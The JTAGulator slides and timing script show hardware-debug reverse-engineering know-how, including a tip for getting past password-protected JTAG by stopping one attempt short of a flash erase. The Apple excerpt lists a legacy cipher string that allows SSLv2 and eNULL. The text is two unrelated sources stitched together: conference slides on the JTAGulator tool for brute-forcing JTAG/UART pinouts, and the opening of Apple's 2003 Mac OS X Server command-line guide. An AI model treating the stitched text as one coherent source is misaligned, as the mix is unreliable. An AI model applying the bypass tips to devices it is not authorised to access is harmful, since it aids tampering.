Determining Pin Function • Identify test points/connector & target device • Trace connections - Visually or w/ multimeter in continuity mode - For devices where pins aren't accessible (BGA), remove device or use X-ray - Use data sheet to match pin number to function • Probe connections - Use oscilloscope or logic analyzer - Pull pins high or low, observe results, repeat - Logic state or number of pins can help to make educated guesses On-Chip Debug Interfaces • JTAG • UART JTAG • Industry-standard interface (IEEE 1149.1) - Created for chip- and system-level testing - Defines low-level functionality of finite state machine/ Test Access Port (TAP) - http://en.wikipedia.org/wiki/Joint_Test_Action_Group • Provides a direct interface to hardware - Can "hijack" all pins on the device (Boundary scan/ test) - Can access other devices connected to target chip - Programming/debug interface (access to Flash, RAM) - Vendor-defined functions/test modes might be available JTAG 2 • Multiple devices can be "chained" together for communication to all via a single JTAG 
port - Even multiple dies within the same chip package - Different vendors may not play well together • Development environments abstract low-level functionality from the user - Implementations are device- or family-specific - As long as we can locate the interface/pinout, let other tools do the rest JTAG: Architecture • Synchronous serial interface → TDI = Data In (to target device) ← TDO = Data Out (from target device) → TMS = Test Mode Select → TCK = Test Clock → /TRST = Test Reset (optional for async reset) • Test Access Port (TAP) w/ Shift Registers - Instruction (>= 2 bit wide) - Data - Bypass (1 bit) - Boundary Scan (variable) - Device ID (32 bit) (optional) JTAG: TAP Controller *** State transitions occur on rising edge of TCK based on current state and value of TMS *** TAP provides 4 major operations: Reset, Run-Test, Scan DR, Scan IR *** Can move to Reset state from any other state w/ TMS high for 5x TCK *** 3 primary steps in Scan: Capture, Shift, Update *** Data held in "shadow" latch until Update state JTAG: Instructions ┌───────────┬─────────────┬──────────┬───────────────────────────────────────────────────────────────────────┐ │ Name │ Required? │ Opcode │ Description │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ BYPASS │ Y │ All 1s │ Bypass on-chip system logic. Allows serial data to be transferred │ │ │ │ │ from TDI to TDO without affecting operation of the IC. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ SAMPRE │ Y │ Varies │ Used for controlling (preload) or observing (sample) the signals at │ │ │ │ │ device pins. Enables the boundary scan register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ EXTEST │ Y │ All 0s │ Places the IC in external boundary test mode. Used to test device │ │ │ │ │ interconnections. Enables the boundary scan register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ INTEST │ N │ Varies │ Used for static testing of internal device logic in a single-step │ │ │ │ │ mode. Enables the boundary scan register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ RUNBIST │ N │ Varies │ Places the IC in a self-test mode and selects a user-specified data │ │ │ │ │ register to be enabled. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ CLAMP │ N │ Varies │ Sets the IC outputs to logic levels as defined in the boundary scan │ │ │ │ │ register. Enables the bypass register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ HIGHZ │ N │ Varies │ Sets all IC outputs to a disabled (high impedance) state. Enables │ │ │ │ │ the bypass register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ IDCODE │ N │ Varies │ Enables the 32-bit device identification register. Does not affect │ │ │ │ │ operation of the IC. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ USERCODE │ N │ Varies │ Places user-defined information into the 32-bit device │ │ │ │ │ identification register. Does not affect operation of the IC. 
│ └───────────┴─────────────┴──────────┴───────────────────────────────────────────────────────────────────────┘ JTAG: Protection • Implementation specific • Security fuse physically blown prior to release - Could be repaired w/ silicon die attack • Password required to enable functionality - Ex.: Flash erased after n attempts (so perform n-1), then reset and continue • May allow BYPASS, but prevent higher level functionality - Ex.: TI MSP430 JTAG: HW Tools • RIFF Box - www.jtagbox.com • H-JTAG - www.hjtag.com/en/ • Bus Blaster (open source) - http://dangerousprototypes.com/docs/Bus_Blaster • Wiggler or compatible (parallel port) - ftp://www.keith-koep.com/pub/arm-tools/jtag/ jtag05_sch.pdf JTAG: SW Tools • OpenOCD (Open On-Chip Debugger) - http://openocd.sourceforge.net • UrJTAG (Universal JTAG Library) - www.urjtag.org UART • Universal Asynchronous Receiver/Transmitter - No external clock needed - Data bits sent LSB first (D0) - NRZ (Non-Return-To-Zero) coding - Transfer speed (bits/second) = 1 / bit width - http://en.wikipedia.org/wiki/Asynchronous_serial_ communication *** Start bit + Data bits + Parity (optional) + Stop bit(s) UART 2 • Asynchronous serial interface → TXD = Transmit data (to target device) ← RXD = Receive data (from target device) ↔ DTR, DSR, RTS, CTS, RI, DCD = Control signals (uncommon for modern implementations) • Many embedded systems use UART as debug output/console UART 3 Bit width = ~8.7uS Mark (Idle) Space Hardware Design Requirements • Open source/hackable/expandable • Simple command-based interface • Proper input protection • Adjustable target voltage • Off-the-shelf components • Hand solderable (if desired) Block Diagram MCU Parallax Propeller EEPROM 24LC512 2 (I2C) Power Switch MIC2025-2YM LDO LD1117S33TR USB 5V 3.3V D/A AD8655 1.2V - 3.3V ~13mV/step Serial-to-USB FT232RL 2 1 (PWM) Host PC USB Mini-B Voltage Level Translator TXS0108EPWR Voltage Level Translator TXS0108EPWR Voltage Level Translator TXS0108EPWR Input Protection Circuitry 24 Target Device 1 Status Indicator WP59EGW PCB *** 2x5 headers compatible w/ Bus Pirate probes, http://dangerousprototypes.com/docs/Bus_Pirate Target I/F (24 channels) Propeller USB Input protection Level translation Status Op-Amp/DAC *** INFORMATION: www.parallax.com/propeller/ *** DISCUSSION FORUMS: http://forums.parallax.com *** OBJECT EXCHANGE: http://obex.parallax.com • Completely custom, ground up design • 8 independent cogs @ 20 MIPS each • Code in Spin, ASM, or C • Used in DEFCON XX Badge Propeller/Core • Clock: DC to 128MHz (80MHz recommended) • Global (hub) memory: 32KB RAM, 32KB ROM • Cog memory: 2KB RAM each • GPIO: 32 @ 40mA sink/source per pin • Program code loaded from external EEPROM on power-up Propeller/Core 2 Propeller/Core 3 • Standard development using Propeller Tool & Parallax Serial Terminal (Windows) • Programmable via serial interface (usually in conjunction w/ USB-to-serial IC) Propeller/Core 4 USB Interface • Allows for Propeller programming & UI • Powers JTAGulator from bus (5V) • FT232RL USB-to-Serial UART - Entire USB protocol handled on-chip - Host will recognize as a virtual serial port (Windows, OS X, Linux) • MIC2025 Power Distribution Switch - Internal current limiting, thermal shutdown - Let the FT232 enumerate first (@ < 100mA), then enable system load Adjustable Target Voltage • PWM from Propeller - Duty cycle corresponds to output voltage (VADJ) - Look-up table for values in 0.1V increments • AD8655 Low Noise, Precision CMOS Amplifier - Single supply, rail-to-rail - 220mA output current 
(~150mA @ Vo = 1.2V-3.3V) - Voltage follower configuration to serve as DAC buffer Level Translation • Allows 3.3V signals from Propeller to be converted to VADJ (1.2V-3.3V) • Prevents potential damage due to over-voltage on target device's unknown connections • TXS0108E Bidirectional Voltage-Level Translator - Designed for both open drain and push-pull interfaces - Internal pull-up resistors (40kΩ when driving low, 4kΩ when high) - Automatic signal direction detection - High-Z outputs when OE low -> will not interfere with target when not in use Input Protection • Prevent high voltages/spikes on unknown pins from damaging JTAGulator • Diode limiter clamps input if needed • Vf must be < 0.5V to protect TXS0108Es Bill-of-Materials • All components from Digi-Key • Total cost per unit = $50.73 JTAGulator JTAGulator Bill-of-Materials Bill-of-Materials Bill-of-Materials HW B, Document 1.0, April 19, 2013 HW B, Document 1.0, April 19, 2013 HW B, Document 1.0, April 19, 2013 Item Quantity Reference Manufacturer Manuf. Part # Distributor Distrib. Part # Description 1 2 C1, C2 Kemet C1206C103K5RACTU Digi-Key 399-1234-1-ND Capacitor, 0.01uF ceramic, 10%, 50V, X7R, 1206 2 14 C3, C6, C9, C11, C12, C13, C14, C15, C17, C18, C19, C20, C21, C22 Kemet C1206C104K5RACTU Digi-Key 399-1249-1-ND Capacitor, 0.1uF ceramic, 10%, 50V, X7R, 1206 3 1 C4 Yageo CC1206KRX7R9BB102 Digi-Key 311-1170-1-ND Capacitor, 1000pF ceramic, 10%, 50V, X7R, 1206 4 1 C5 Yageo CC1206KRX7R9BB471 Digi-Key 311-1167-1-ND Capacitor, 470pF ceramic, 10%, 50V, X7R, 1206 5 1 C7 Kemet T491A106M016AS Digi-Key 399-3687-1-ND Capacitor, 10uF tantalum, 20%, 16V, size A 6 2 C8, C10 Kemet T491A475K016AT Digi-Key 399-3697-1-ND Capacitor, 4.7uF tantalum, 10%, 16V, size A 7 1 D1 Kingbright WP59EGW Digi-Key 754-1232-ND LED, Red/Green Bi-Color, T-1 3/4 (5mm) 8 1 L1 TDK MPZ2012S221A Digi-Key 445-1568-1-ND Inductor, Ferrite Bead, 220R@100MHz, 3A, 0805 9 1 P1 Hirose Electric UX60-MB-5S8 Digi-Key H2960CT-ND Connector, Mini-USB, 5-pin, SMT w/ PCB mount 10 5 P2, P3, P4, P5, P6 TE Connectivity 282834-5 Digi-Key A98336-ND Connector, Terminal Block, 5-pin, side entry, 0.1” P 11 3 P7, P8, P9 3M 961210-6404-AR Digi-Key 3M9460-ND Header, Dual row, Vertical header, 2x5-pin, 0.1” P 12 1 Q1 Fairchild MMBT3904 Digi-Key MMBT3904FSCT-ND Transistor, NPN, 40V, 200mA, SOT23-3 13 5 R1, R2, R3, R4, R10 Any Any Digi-Key P10KECT-ND Resistor, 10k, 5%, 1/4W, 1206 14 1 R5 Any Any Digi-Key P470ECT-ND Resistor, 470 ohm, 5%, 1/4W, 1206 15 1 R6 Any Any Digi-Key P270ECT-ND Resistor, 270 ohm, 5%, 1/4W, 1206 16 1 R7 Any Any Digi-Key P18.0KFCT-ND Resistor, 18k, 1%, 1/4W, 1206 17 1 R8 Any Any Digi-Key P8.20KFCT-ND Resistor, 8.2k, 1%, 1/4W, 1206 18 1 R9 Any Any Digi-Key P100KECT-ND Resistor, 100k, 5%, 1/4W, 1206 19 3 R11, R12, R13 Bourns 4816P-1-102LF Digi-Key 4816P-1-102LFCT-ND Resistor, Array, 8 isolated, 1k, 2%, 1/6W, SOIC16 20 1 SW1 C&K KSC201JLFS Digi-Key 401-1756-1-ND Switch, SPST, Momentary, 120gf, 6.2 x 6.2mm, J-Lead 21 1 U1 FTDI FT232RL-REEL Digi-Key 768-1007-1-ND IC, USB-to-UART Bridge, SSOP28 22 1 U2 Parallax P8X32A-Q44 Digi-Key P8X32A-Q44-ND IC, Microcontroller, Propeller, LQFP44 23 1 U3 Micrel MIC2025-2YM Digi-Key 576-1058-ND IC, Power Distribution Switch, Single-channel, SOIC8 24 1 U4 Microchip 24LC512-I/SN Digi-Key 24LC512-I/SN-ND IC, Memory, Serial EEPROM, 64KB, SOIC8 25 1 U5 Analog Devices AD8655ARZ Digi-Key AD8655ARZ-ND IC, Op. 
Amp., CMOS, Rail-to-rail, 220mA Iout, SOIC8 26 1 U6 ST Microelectronics LD1117S33CTR Digi-Key 497-1241-1-ND IC, Voltage Regulator, LDO, 3.3V@800mA, SOT223 27 6 U7, U8, U10, U11, U13, U14 ON Semiconductor NUP4302MR6T1G Digi-Key NUP4302MR6T1GOSCT-ND IC, Schottky Diode Array, 4 channel, TSOP6 28 3 U9, U12, U15 Texas Instruments TXS0108EPWR Digi-Key 296-23011-1-ND IC, Level Translator, Bi-directional, TSSOP20 29 1 Y1 ECS ECS-50-18-4XEN Digi-Key XC1738-ND Crystal, 5.0MHz, 18pF, HC49/US 30 1 PCB Any JTAG B N/A N/A PCB, Fabrication Firmware Source Tree General Commands • Set target system voltage (V) (1.2V-3.3V) • Read all channels (R) • Write all channels (W) • Print available commands (H) JTAG Commands • Identify JTAG pinout via IDCODE scan (I) • Identify JTAG pinout via BYPASS scan (B) • Get Device IDs (D) (w/ known pinout) • Test BYPASS (T) (w/ known pinout) IDCODE Scan • 32-bit Device ID (if available) is in the DR on TAP reset or IC power-up - Otherwise, TAP will reset to BYPASS (LSB = 0) - Can simply enter Shift-DR state and clock out on TDO - TDI not required/used during IDCODE acquisition LSB IDCODE Scan 2 • Device ID values vary with part/family/vendor - Locate in data sheets, BSDL files, reference code, etc. • Manufacturer ID provided by JEDEC - Each manufacturer assigned a unique identifier - Can use to help validate that proper IDCODE was retrieved - http://www.jedec.org/standards-documents/ results/jep106 IDCODE Scan 3 • Ask user for number of channels to use • For every possible pin permutation (except TDI) - Set unused channels to output high (in case of any active low reset pins) - Configure JTAG pins to use on the Propeller - Reset the TAP - Try to get the Device ID by reading the DR - If Device ID is 0xFFFFFFFF or if bit 0 != 1, ignore - Otherwise, display potentially valid JTAG pinout BYPASS Scan • In BYPASS, data shifted into TDI is received on TDO delayed by one clock cycle BYPASS Scan 2 • Can determine how many devices (if any) are in the chain via "blind interrogation" - Force device(s) into BYPASS (IR of all 1s) - Send 1s to fill DRs - Send a 0 and count until it is output on TDO BYPASS Scan 3 • Ask user for number of channels to use • For every possible pin permutation - Set unused channels to output high (in case of any active low reset pins) - Configure JTAG pins to use on the Propeller - Reset the TAP - Perform blind interrogation - If number of detected devices > 0, display potentially valid JTAG pinout DEFCON 17 Badge • Freescale MC56F8006 Digital Signal Controller - ID = 0x01C0601D - www.bsdl.info/details.htm?sid=e82c74686c7522e 888ca59b002289d77 MSB LSB ┌───────┬───────────────┬─────────────┬─────────────────┬─────────────────┬───────┐ │ Ver. 
│ Design Center │ Core Number | Chip Derivative | Manufacturer ID │ Fixed │ └───────┴───────────────┴─────────────┴─────────────────┴─────────────────┴───────┘ 31...28 27...22 21...17 16...12 11...1 0 0000 000111 00000 (DSP56300) 00110 00000001110 (0x0E) 1 UART Commands • Identify UART pinout (U) • UART pass through (P) (w/ known pinout) UART Scan • Ask user for desired output string (up to 16 bytes) • Ask user for number of channels to use • For every possible pin permutation - Configure UART pins to use on the Propeller - Set baud rate - Send user string - Wait to receive data (20ms maximum per byte) - If any bytes received, display potentially valid UART pinout and data (up to 16 bytes) UART Scan 2 • 8 data bits, no parity, 1 stop bit (8N1) • Baud rates stored in look-up table - 75, 110, 150, 300, 900, 1200, 1800, 2400, 3600, 4800, 7200, 9600, 14400, 19200, 28800, 31250, 38400, 57600, 76800, 115200, 153600, 230400, 250000, 307200 Linksys WRT54G v2 rXH (w/ DD-WRT) • Broadcom BCM4712 - ID = 0x1471217F - https://github.com/notch/tjtag/blob/master/tjtag.c - UART: JP1 (TXD = 4, RXD = 6) @ 115200, 8N1 *** www.jtagtest.com/pinouts/wrt54 Scan Timing # of Channels IDCODE Permutations IDCODE (mm:ss) BYPASS Permutations BYPASS (mm:ss) 4 24 < 00:01 24 00:02 8 336 00:02 1680 02:05 16 3360 00:13 43680 54:27 24 12144 00:46 255024 317:54 • IDCODE - TDI ignored since we're only shifting data out of DR - ~264 permutations/second • BYPASS - Many bits/permutation needed to account for multiple devices in chain and varying IR lengths - ~13.37 permutations/second Scan Timing 2 # of Channels UART Permutations Time (mm:ss) 4 12 00:12 8 56 00:57 16 240 4:04 24 552 9:22 • UART - Only need to locate two pins (TXD/RXD) - 24 baud rates/permutation - ~1 permutation/second Demonstration Possible Limitations • Could cause target to behave abnormally due to "fuzzing" unknown pins • OCD interface isn't being properly enabled - Non-standard configuration - Password protected - System expects defined reset sequence or pin setting • OCD interface is physically disconnected - Cut traces, missing jumpers/0 ohm resistors • No OCD interface exists *** Additional reverse engineering will be necessary to determine the problem or discover pinout Future Work • Add support for other interfaces - TI Spy-Bi-Wire, ARM Serial Wire Debug, Microchip ICSP, Atmel AVR ISP Other Uses • Propeller development board • Logic analyzer • Inter-chip communication/probing ala Bus Pirate or GoodFET • ??? Get It • www.jtagulator.com *** Schematics, firmware, BOM, block diagram, Gerber plots, photos, other engineering documentation • www.parallax.com *** Assembled units, bare boards, accessories A Poem The End.
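The scan-timing tables follow directly from counting ordered pin assignments and the per-second rates quoted above (about 264 IDCODE permutations/s, 13.37 BYPASS permutations/s and roughly 1 UART permutation/s). A small sketch that approximately reproduces those tables:

```python
from math import perm   # Python 3.8+

# Pins that must be located per scan type: IDCODE needs TDO/TCK/TMS (TDI is ignored),
# BYPASS adds TDI, and the UART scan only needs TXD/RXD.
PINS_NEEDED = {"IDCODE": 3, "BYPASS": 4, "UART": 2}
RATE = {"IDCODE": 264.0, "BYPASS": 13.37, "UART": 1.0}   # permutations/second, from the talk

def mmss(seconds):
    minutes, secs = divmod(int(round(seconds)), 60)
    return f"{minutes:02d}:{secs:02d}"

for channels in (4, 8, 16, 24):
    cells = [f"{channels:2d} channels"]
    for scan in ("IDCODE", "BYPASS", "UART"):
        count = perm(channels, PINS_NEEDED[scan])        # ordered choices of pins among channels
        cells.append(f"{scan}: {count} (~{mmss(count / RATE[scan])})")
    print("  ".join(cells))
```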
Mac OS X Server Command-Line Administration For Version 10.3 or Later 034-2454_Cvr 10/15/03 11:47 AM Page 1  Apple Computer, Inc. © 2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid for support services. The Apple logo is a trademark of Apple Computer, Inc., registered in the U.S. and other countries. Use of the “keyboard” Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, AirPort, AppleScript, AppleShare, AppleTalk, ColorSync, FireWire, iMac, Keychain, Mac, Macintosh, Power Mac, Power Macintosh, QuickTime, Sherlock, and WebObjects are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. Extensions Manager and Finder are trademarks of Apple Computer, Inc. 034-2354/10-24-03 LL2354.book Page 2 Monday, October 20, 2003 9:47 AM 3 1 Contents Preface 11 About This Book 11 Notation Conventions 11 Summary 11 Commands and Other Terminal Text 11 Command Parameters and Options 12 Default Settings 12 Commands Requiring Root Privileges Chapter 1 13 Typing Commands 13 Using Terminal 14 Correcting Typing Errors 14 Repeating Commands 14 Including Paths Using Drag-and-Drop 15 Commands Requiring Root Privileges 16 Sending Commands to a Remote Server 16 Sending a Single Command 17 Updating SSH Key Fingerprints 17 Notes on Communication Security and servermgrd 18 Using Telnet 18 Getting Online Help for Commands 19 Notes About Specific Commands and Tools 19 serversetup 19 serveradmin Chapter 2 21 Installing Server Software and Finishing Basic Setup 21 Installing Server Software 21 Automating Server Setup 21 Creating a Configuration File Template 22 Creating Customized Configuration Files from the Template File 25 Naming Configuration Files 25 Storing a Configuration File in an Accessible Location 25 Changing Server Settings LL2354.book Page 3 Monday, October 20, 2003 9:47 AM 4 Contents 26 Viewing, Validating, and Setting the Software Serial Number 26 Updating Server Software 27 Moving a Server Chapter 3 29 Restarting or Shutting Down a Server 29 Restarting a Server 29 Examples 29 Automatic Restart 30 Changing a Remote Server’s Startup Disk 30 Shutting Down a Server 30 Examples Chapter 4 31 Setting General System Preferences 31 Computer Name 31 Viewing or Changing the Computer Name 31 Date and Time 32 Viewing or Changing the System Date 32 Viewing or Changing the System Time 32 Viewing or Changing the System Time Zone 33 Viewing or Changing Network Time Server Usage 33 Energy Saver Settings 33 Viewing or Changing Sleep Settings 33 Viewing or Changing Automatic Restart Settings 34 Power Management Settings 34 Startup Disk Settings 34 Viewing or Changing the Startup Disk 35 Sharing Settings 35 Viewing or Changing Remote Login Settings 35 Viewing or Changing Apple Event Response 35 International Settings 35 Viewing or Changing Language Settings 36 Login Settings 36 Disabling the Restart and Shutdown Buttons Chapter 5 37 Network Preferences 37 Network Interface Information 37 Viewing Port Names and Hardware Addresses 38 Viewing or Changing MTU Values 38 Viewing or Changing Media Settings 38 Network Port Configurations 38 
Preface: About This Book

Notation Conventions
The following conventions are used throughout this book.

Summary
• monospaced font: A command or other terminal text
• $: A shell prompt
• [text_in_brackets]: An optional parameter
• (one|other): Alternative parameters (type one or the other)
• underlined: A parameter you must replace with a value
• [...]: A parameter that may be repeated
• <anglebrackets>: A displayed value that depends on your server configuration

Commands and Other Terminal Text
Commands or command parameters that you might type, along with other text that normally appears in a Terminal window, are shown in this font. For example,
You can use the doit command to get things done.
When a command is shown on a line by itself as you might type it in a Terminal window, it follows a dollar sign that represents the shell prompt. For example,
$ doit
To use this command, type "doit" without the dollar sign at the command prompt in a Terminal window, then press the Return key.

Command Parameters and Options
Most commands require one or more parameters to specify command options or the item to which the command is applied.

Parameters You Must Type as Shown
If you need to type a parameter as shown, it appears following the command in the same font. For example,
$ doit -w later -t 12:30
To use the command in the above example, type the entire line as shown.

Parameter Values You Provide
If you need to supply a value, its placeholder is underlined and has a name that indicates what you need to provide. For example,
$ doit -w later -t hh:mm
In the above example, you need to replace hh with the hour and mm with the minute, as shown in the previous example.

Optional Parameters
If a parameter is available but not required, it appears in square brackets. For example,
$ doit [-w later]
To use the command in the above example, type either doit or doit -w later. The result might vary, but the command will be performed either way.

Alternative Parameters
If you need to type one of a number of parameters, they're separated by a vertical line and grouped within parentheses ( | ). For example,
$ doit -w (now|later)
To perform the command, you must type either doit -w now or doit -w later.

Default Settings
Descriptions of server settings usually include the default value for each setting. When this default value depends on other choices you've made (such as the name or IP address of your server), it's enclosed in angle brackets <>. For example, the default value for the IMAP mail server is the host name of your server.
This is indicated by mail:imap:servername = "<hostname>".

Commands Requiring Root Privileges
Throughout this guide, commands that require root privileges begin with sudo.

1 Typing Commands
How to use Terminal to execute commands, connect to a remote server, and view online information about commands and utilities.
To access a UNIX shell command prompt, you open the Terminal application. In Terminal, you can use the ssh command to log in to other servers. You can use the man command to view online documentation for most common commands.

Using Terminal
To enter shell commands or run server command-line tools and utilities, you need access to a UNIX shell prompt. Both Mac OS X and Mac OS X Server include Terminal, an application you can use to start a UNIX shell command-line session on the local server or on a remote server.
To open Terminal:
• Click the Terminal icon in the Dock or double-click the application icon in the Finder (in /Applications/Utilities).
Terminal presents a prompt when it's ready to accept a command. The prompt you see depends on Terminal and shell preferences, but often includes the name of the host you're logged in to, your current working directory, your user name, and a prompt symbol. For example, if you're using the default bash shell and the prompt is
server1:~ admin$
you're logged in to a computer named "server1" as the user named "admin", and your current directory is the admin's home directory (~).
Throughout this manual, wherever a command is shown as you might type it, the prompt is abbreviated as $.

To type a command:
• Wait for a prompt to appear in the Terminal window, then type the command and press Return.
If you get the message command not found, check your spelling. If the error recurs, the program you're trying to run might not be in your default search path. Add the path before the program name or change your working directory to the directory that contains the program. For example:
[server:/] admin$ serversetup -getAllPort
serversetup: Command not found.
[server:/] admin$ /System/Library/ServerSetup/serversetup -getAllPort
1 Built-in Ethernet
[server:/] admin$ cd /System/Library/ServerSetup
[server:/System/Library/ServerSetup] admin$ ./serversetup -getAllPort
1 Built-in Ethernet
[server:/System/Library/ServerSetup] admin$ cd /
[server:/] admin$ PATH="$PATH:/System/Library/ServerSetup"
[server:/] admin$ serversetup -getAllPort
1 Built-in Ethernet

Correcting Typing Errors
To correct a typing error before you press Return to issue the command, use the Delete key or press Control-H to erase unwanted characters, then retype. To ignore what you have typed and start again, press Control-U.

Repeating Commands
To repeat a command, press Up-Arrow until you see the command, then press Return. To repeat a command with modifications, press Up-Arrow until you see the command, press Left-Arrow or Right-Arrow to skip over parts of the command you don't want to change, press Delete to remove characters, type regular characters to insert them, then press Return to execute the command.

Including Paths Using Drag-and-Drop
To include a fully qualified file name or directory path in a command, stop typing where the item is required in the command and drag the folder or file from a Finder window into the Terminal window.
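If the dragged item's name contains spaces, Terminal typically inserts the path with the spaces escaped so the command still parses it as a single path. A hypothetical example of the resulting command line (the folder name here is made up):
$ ls -l /Volumes/Data/Annual\ Reports
You can then press Return to run the command, or keep typing additional parameters after the inserted path.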
LL2354.book Page 14 Monday, October 20, 2003 9:47 AM Chapter 1 Typing Commands 15 Commands Requiring Root Privileges Many commands used to manage a server must be executed by the root user. If you get a message such as “permission denied,” the command probably requires root privileges. To issue a single command as the root user, begin the command with sudo. For example: $ sudo serveradmin list You’re prompted for the root password if you haven’t used sudo recently. The root user password is set to the administrator user password when you install Mac OS X Server. To switch to the root user so you don’t have to repeatedly type sudo, use the su command: $ su root You’re prompted for the root user password and then are logged in as the root user until you log out or use the su command to switch to another user. Important: As the root user, you have sufficient privileges to do things that can cause your server to stop working properly. Don’t execute commands as the root user unless you understand clearly what you’re doing. Logging in as an administrative user and using sudo selectively might prevent you from making unintended changes. Throughout this guide, commands that require root privileges begin with sudo. LL2354.book Page 15 Monday, October 20, 2003 9:47 AM 16 Chapter 1 Typing Commands Sending Commands to a Remote Server Secure Shell (SSH) lets you send secure, encrypted commands to a server over the network. You can use the ssh command in Terminal to open a command-line connection to a remote server. While the connection is open, commands you type are performed on the remote server. Note: You can use any application that supports SSH to connect to Mac OS X Server. To open a connection to a remote server: 1 Open Terminal. 2 Type the following command to log in to the remote server: ssh -l username server where username is the name of an administrator user on the remote server and server is the name or IP address of the server. Example: ssh -l admin 10.0.1.2 3 If this is the first time you’ve connected to the server, you’re prompted to continue connecting after the remote computer’s RSA fingerprint is displayed. Type yes and press Return. 4 When prompted, type the user’s password (the user’s password on the remote server) and press Return. The command prompt changes to show that you’re now connected to the remote server. In the case of the above example, the prompt might look like [10.0.1.2:~] admin$ 5 To send a command to the remote server, type the command and press Return. To close a remote connection m Type logout and press Return. Sending a Single Command You can authenticate and send a command using a single typed line by appending the command you want to execute to the basic ssh command. For example, to delete a file you could type $ ssh -l admin server1.company.com rm /Users/admin/Documents/report or $ ssh -l admin@server1.company.com "rm /Users/admin/Documents/report" You’re prompted for the user’s password. LL2354.book Page 16 Monday, October 20, 2003 9:47 AM Chapter 1 Typing Commands 17 Updating SSH Key Fingerprints The first time you connect to a remote server using SSH, the local computer asks if it can add the remote server’s “fingerprint” (a security key) to a list of known remote computers. You might see a message like this: The authenticity of host "server1.company.com" can’t be established. RSA key fingerprint is a8:0d:27:63:74:f1:ad:bd:6a:e4:0d:a3:47:a8:f7. Are you sure you want to continue connecting (yes/no)? Type yes and press Return to finish authenticating. 
If you later see a warning message about a “man-in-the-middle” attack when you try to connect, it might be because the key on the remote computer no longer matches the key stored on the local computer. This can happen if you: • Change your SSH configuration • Perform a clean install of the server software • Start up from a Mac OS X Server CD To connect again, delete the entries corresponding to the remote computer (which can be stored by both name and IP address) in the file ~/.ssh/known_hosts. Important: Removing an entry from the known_hosts file bypasses a security mechanism that helps you avoid imposters and “man-in -the-middle” attacks. Be sure you understand why the key on the remote computer has changed before you delete its entry from the known_hosts file. Notes on Communication Security and servermgrd When you use the Server Admin GUI application or the serveradmin command-line tool, you’re communicating with a local or remote servermgrd process. • servermgrd uses SSL for encryption and client authentication but not for user authentication, which uses HTTP basic authentication along with Directory Services. • servermgrd uses a self-signed (test) SSL certificate installed by default in /etc/servermgrd/ssl.crt/. You can replace this with an actual certificate. • The default certificate format for SSLeay/OpenSSL is PEM, which actually is Base64 encoded DER with header and footer lines (from www.modssl.org). • servermgrd checks the validity of the SSL certificate only if the “Require valid digital signature” option is checked in Server Admin preferences. If this option is enabled, the certificate must be valid and not expired or Server Admin will refuse to connect. • The SSLOptions and SSLRequire settings determine what SSL encryption options are used. By default, they’re set as shown below but can be changed at any time by editing /etc/servermgrd/servermgrd.conf, port 311. SSLCertificateFile /private/etc/servermgrd/ssl.crt/server.crt SSLCertificateKeyFile /private/etc/servermgrd/ssl.key/server.key SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLOptions +StdEnvVars LL2354.book Page 17 Monday, October 20, 2003 9:47 AM 18 Chapter 1 Typing Commands Using Telnet Because it isn’t as secure as SSH, Telnet access isn’t enabled by default. To enable Telnet access: $ service telnet start To disable Telnet access: $ service telnet stop Getting Online Help for Commands Onscreen help is available for most commands and utilities. Note: Not all techniques work for all commands, and some commands have no onscreen help. To view onscreen information about a command, try the following: • Type the command without any parameters or options. This will often list a summary of options and parameters you can use with the command. Example: $ sudo serveradmin • Type man command, where command is the command you’re curious about. This usually displays detailed information about the command, its options, parameters, and proper use. Example: $ man serveradmin For help using the man command, type: $ man man • Type the command followed by a -help, -h, --help, or help parameter. Examples: $ hdiutil help $ dig -h $ diff --help LL2354.book Page 18 Monday, October 20, 2003 9:47 AM Chapter 1 Typing Commands 19 Notes About Specific Commands and Tools serversetup The serversetup utility is located in /System/Library/ServerSetup. 
To run this command, you can type the full path, for example: $ /System/Library/ServerSetup/serversetup -getAllPort Or, if you want to use the utility to perform several commands, you can change your working directory and type a shorter command: $ cd /System/Library/ServerSetup $ ./serversetup -getAllPort $ ./serversetup -getDefaultInfo or add the directory to your search path for this session and type an even shorter command: $ PATH = "$PATH:/System/Library/ServerSetup" $ serversetup -getAllPort To permanently add the directory to your search path, add the path to the file /etc/profile. serveradmin You can use the serveradmin tool to perform many service-related tasks. You’ll see it used throughout this guide. Determining Whether a Service Needs to be Restarted Some services need to be restarted after you change certain settings. If a change you make using a service’s writeSettings command requires that you restart the service, the output from the command includes the setting <svc>:needsRecycleOrRestart with a value of yes. Important: The needsRecycleOrRestart setting is displayed only if you use the serveradmin svc:command = writeSettings command to change settings. You won’t see it if you use the serveradmin settings command. LL2354.book Page 19 Monday, October 20, 2003 9:47 AM LL2354.book Page 20 Monday, October 20, 2003 9:47 AM 2 21 2 Installing Server Software and Finishing Basic Setup Commands you can use to install, set up, and update Mac OS X Server software on local or remote computers. Installing Server Software You can use the installer command to install Mac OS X Server or other software on a computer. For more information, see the man page. Automating Server Setup Normally, when you install Mac OS X Server on a computer and restart, the Server Assistant opens and asks you to provide the basic information necessary to get the server up and running (for example, the name and password of the administrator user, the TCP/IP configuration information for the server’s network interfaces, and how the server uses directory services). You can automate this initial setup task by providing a configuration file that contains these settings. Servers starting up for the first time look for this file and use it to complete initial server setup without user interaction. Creating a Configuration File Template An easy way to prepare configuration files to automate the setup of a group of servers is to start with a file saved using the Server Assistant. You can save the file as the last step 